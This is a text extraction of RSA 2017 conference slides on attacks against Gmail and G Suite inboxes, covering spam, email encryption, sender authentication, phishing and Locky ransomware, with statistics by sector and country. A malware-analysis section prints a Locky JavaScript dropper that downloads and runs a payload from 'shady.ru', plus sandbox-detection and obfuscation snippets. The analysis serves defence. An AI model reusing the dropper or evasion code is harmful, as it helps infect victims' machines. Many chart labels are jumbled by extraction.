Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017

Elie Bursztein with the help of many Googlers @elie

Targeted Attacks Against Corporate Inboxes - a Gmail Perspective

SESSION ID: HT-R11

g.co/research/protect

1.X BILLION USERS


Stopping hundred of billions of attacks every week


1x

A corporate inbox receives 4.3x more malware than an end-user inbox

4.3x


Science related German companies get 9.6x more phishing attempts than their US counterpart

9.6x

1x


Highlight how various Gmail group of users exhibits different threat profiles


Global trends


Global trends

Organization trends


Global trends

Countries trends

Organization trends

Global trends

Spam

PhishingSpam

Phishing ImpersonationSpam

Phishing MalwareImpersonationSpam

Phishing InterceptionMalwareImpersonationSpam


Spam


Google embraces deep learning

Android Gmail Photos Maps NLP Robotics research Speech Translation YouTube … many others ...


Deep-learning for photos auto-tagging

“ocean”Deep ConvolutionalNeural Network

Automatic TagUser photo


Deep Learning power Google photos search

“Wow, the new Google photo search is a bit

insane. I didn’t tag those”

“Google photo search is awesome. Searched with

keyword drawing to find all my scribble at once :D”



Tensor power unit

We do deep-learning efficiently and at Google scale thanks to dedicated ASICs

https://cloudplatform.googleblog.com/2016/05/Google-supercharges-machine-learning-tasks-with-custom-chip.html

Using deep-learning allows us stay ahead of spammers


Interception


Encrypting email in transit with STARTTLS

Sender (Alice)



Sender (Alice)

Mail server (smtp.source.com)



Mail server (smtp.destination.com)

Sender (Alice)


Recipient (Bob)



Mail server (smtp.destination.com)

Eavesdropper (Eve)

Sender (Alice)


Recipient (Bob)


80% 87%


Transparency report - June 2014

https://googleblog.blogspot.com/2014/06/transparency-report-protecting-emails.html


Transparency report

Inbound traffic Outbound traffic

Frac

tion

of e

mai

l enc

rypt

ed

0%

10%

20%

30%

40%

50%

60%

70%

80%

90%

2013-12

2014-03

2014-06

2014-09

2014-12

2015-03

2015-06

2015-09

2015-12

2016-03

2016-06

2016-09

2016-12


Broken lock UI - February 2016


Broken lock UI

Inbound traffic Outbound traffic

Frac

tion

of e

mai

l enc

rypt

ed

0%

10%

20%

30%

40%

50%

60%

70%

80%

90%

2013-12

2014-03

2014-06

2014-09

2014-12

2015-03

2015-06

2015-09

2015-12

2016-03

2016-06

2016-09

2016-12

Increasing encryption visibility helped speed-up adoption


Next: SMTP strict transport security

Prevent MITM using rogue certificate Like HTTPS pinning for email

Coming soon!

Industry wide effort via MAAWG and IETF Google, Microsoft, Yahoo, Comcast are all on board

SMTP Strict Transport security is the next big milestone


Impersonation


DKIMDM

ARC

SPF


DKIMDM

ARC

SPF

Sign your email cryptographically


DKIMDM

ARC

SPF


Specify which email servers to trust


DKIMDM

ARC

SPF


Specify which email servers to trust

Define what to do with fake

emails


Surfacing authentication status

Authenticated Not authenticated

https://blog.google/products/gmail/making-email-safer-for-you-posted-by/


Authentication over-time

https://security.googleblog.com/2013/12/internet-wide-efforts-to-fight-email.html

Dec 2016Dec 2015Dec 2014

5.8% 2.8% 1.8%

Most emails are authenticated

DMARC adoption is too low


Postmaster tools

https://gmail.com/postmaster/

https://gmail.com/postmaster/


Phishing


Targeted financial phishing is on the rise


Malware

Ransomware largest malware threat



Lucky seen by Gmail vs Internet - May 2016

Normalized by number of email, a hash is potentially used in many email

emai

l


Locky is part of a complex ecosystem

LockyDridex


Locky vs Dridex daily pattern - May 2016

Locky

Dridex

Rise of Javascript dropper as a means to evade anti-virus


Anatomy of a Locky dropper

var shell = new ActiveXObject("WScript.Shell");var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");// fetch the payloadvar xhr = new ActiveXObject("MSXML2.XMLHTTP");xhr.open("GET","http://shady.ru/payload.exe",false);xhr.send(null);var payload = xhr.responseBody;// write payload to diskvar writer = ActiveXObject("ADODB.Stream");writer.open();writer.type = 2;writer.write(payload);writer.SaveToFile(tmpDir + "\\payload.exe");// execute the payloadshell.Run(tmpDir + "\\payload.exe", "", false);




Get temp directory




Get temp directory

Fetch payload




Get temp directory

Fetch payload

Write payload to disk




Get temp directory

Fetch payload

Execute payload

Write payload to disk




Locky May 5th attack

20 000 m/h

Internal detector Commercial Anti-virus

Num

ber o

f em

ail b

lock

ed

1x

10x

100x

1000x

04-05 23:00

04-06 0:00

04-06 1:00

04-06 2:00

04-06 3:00

04-06 4:00

04-06 5:00

04-06 6:00

04-06 7:00

04-06 8:00

04-06 9:00

04-06 10:00

04-06 11:00

04-06 12:00

04-06 13:00

04-06 14:00

04-06 15:00

04-06 16:00

04-06 17:00

04-06 18:00


30 000 000 m/hLocky May 5th attack

20 000 m/h

Internal detector Commercial Anti-virus

Num

ber o

f em

ail b

lock

ed

1x

10x

100x

1000x

04-05 23:00

04-06 0:00

04-06 1:00

04-06 2:00

04-06 3:00

04-06 4:00

04-06 5:00

04-06 6:00

04-06 7:00

04-06 8:00

04-06 9:00

04-06 10:00

04-06 11:00

04-06 12:00

04-06 13:00

04-06 14:00

04-06 15:00

04-06 16:00

04-06 17:00

04-06 18:00


Evasion attempts via file type switch


AV DDOS exploit via malicious comments

Comment sample


Javascript obfuscation - Property access

String.prototype.foo = function() { return this.substr(1,1); };namespaces = ('a', 'b', "ip");select = "W";fireWith = "gt".foo();origName = (fireWith.split((1,"b")), "Scr");mozMatchesSelector = (((18 ^ rbracket), (1332 / delegateTarget)), (((162, rscriptType) / (13 & preFilter)), this));bind = mozMatchesSelector[select + origName + namespaces + fireWith];…subtract = bind[noConflict + finalDataType + percent](define + focusin + clientTop);…slideUp = subtract[mouseenter + andSelf + isReady + fireWith + matchesSelector + matchIndexes](JSON + ownerDocument) + file + now;

WScript


Sandbox detection va timer check

var t1 = new Date().getMilliseconds(); WScript.Sleep(10); var t2 = new Date().getMilliseconds(); if (t2-t1 <= 10) WScript.Quit();

HoneyClients don't sleep

Emulation detected!


OS check via the use of Jscript specific behavior

b(); var greet = (function b() { }, "hello");

b is defined and hoisted only in JScript

b.foo(); var greet = (function b() { }, "hello"); function b.prototype.foo() { } not valid ES3/5/6

http.option(1) = true not valid ES6

Organizational trends


Professional inbox are 6.2x more targeted by phishing and 4.3x more targeted by malware than end user inbox

1.0x

1.0x

1.0x

0.4x

6.2x

4.3x

GSuiteGmail

Spam

Phishing

Malware

Organization type insights


A corporate inbox is 3.2x more targeted by phishing email than an EDU inbox

1.0x

1.8x

1.2x

3.2x

Education

Governement related

Non Profit

Company


Non-profit inboxes are 2.3x more targeted by malware than corporate inboxes

2.1x

1.3x

2.3x

1.0x

Education

Governement related

Non Profit

Company


A corporate inbox receive 3.1x more encrypted emails than an EDU inbox

1.0x

1.2x

1.3x

3.1x

Education

Governement related

Non Profit

Company

Company sectors insights


Entertainment, IT and housing related companies are the most targeted by spam as of Q1 2017

1.0x1.3x

1.5x1.5x1.5x

1.7x1.8x

2.2x2.5x2.6x2.6x2.6x

2.7x4.3x

4.9x6.1x

UtilitiesFinance and Insurance

Natural ressourcesManufacturingAdministrative

Wholesale TradeManagement

TransportationScience

ConstructionAccommodation & Food

HealthRetail Trade

HousingInformation Technology

Entertainment


Finance, Arts and IT related companies are the most targeted by phishing as of Q1 2017

1.0x8.6x

1.2x1.8x

1.6x1.9x

1.4x4.9x

2.8x1.8x

1.5x3.3x

2.8x4.3x

6.9x7.6x






HealthRetail Trade


Entertainment


Volume of phishing attempts depend of country and sector

> 10x

1.0x

1.8x

2.8x

3.2x

3.2x

4.4x

5.8x

1.9x

1.4x

1.2x

1.0x

1.7x

1.2x

Finance sector IT sector

France

Canada

USA

India

UK

Japan

Brazil


Entertainment and utilities related companies are the one who received the most encrypted emails as of Q1 2017

1.3x1.0x

1.2x1.2x

1.2x1.2x

1.3x1.3x

1.3x1.1x

1.3x1.2x

1.2x1.1x

1.2x1.3x






HealthRetail Trade


Entertainment


Real estate is by far the sector that is the most targeted by malware as of Q1 2017

1.0x

1.1x

1.2x

1.3x

1.4x

1.7x

1.7x

2.0x

2.2x

2.2x

2.3x

2.4x

3.6x

4.5x

Science

Health Care

Wholesale Trade

Entertainment

Finance and Insurance

Manufacturing

Information Technology

Administrative

Mining

Accommodation and Food

Retail Trade

Utilities

Construction

Transportation

Real Estate > 10x

Countries trends


EU is not at the forefront of email security

STARTTLS DKIM

1.2x

1.1x

1.0x

1.2x

1.1x

1.0x

1.1x

1.1x

1.1x

1.1x

USA

Japan

Brazil

India

UK

France

Canada

Germany

Korea

Australia

1.4x

1.0x

1.6x

1.6x

1.3x

1.4x

1.5x

1.2x

1.6x

1.5x

USA

Japan

Brazil

India

UK

France

Canada

Germany

Korea

Australia


India and Japan have the most spammed Inboxes as of Q1 2017

2.0x

4.1x

2.7x

3.8x

1.3x

1.0x

1.6x

1.2x

1.8x

1.1x

USA

Japan

Brazil

India

UK

France

Canada

Germany

Korea

Australia


The largest spammers in the world target other countries

1. USA 2. Germany 3. France 4. Japan 5. United Kingdom 6. Roumania 7. Spain 8. Brazil 9. Canada 10.Russia


Japan inboxes are heavily targeted by phishing as of Q1 2017.

2.1x

5.9x

3.5x

1.7x

1.9x

1.0x

3.0x

1.6x

1.1x

1.7x

USA

Japan

Brazil

India

UK

France

Canada

Germany

Korea

Australia


Recap

Deep-learning is providing the edge we need to combat email abuse

Transparency helps driving adoption of security technologies through the eco-system

Each organization has a unique threat profile that should be considered when prioritizing defenses


https://g.co/research/gmail-lessons

https://g.co/research/gmail-lessons

Thanks g.co/research/protect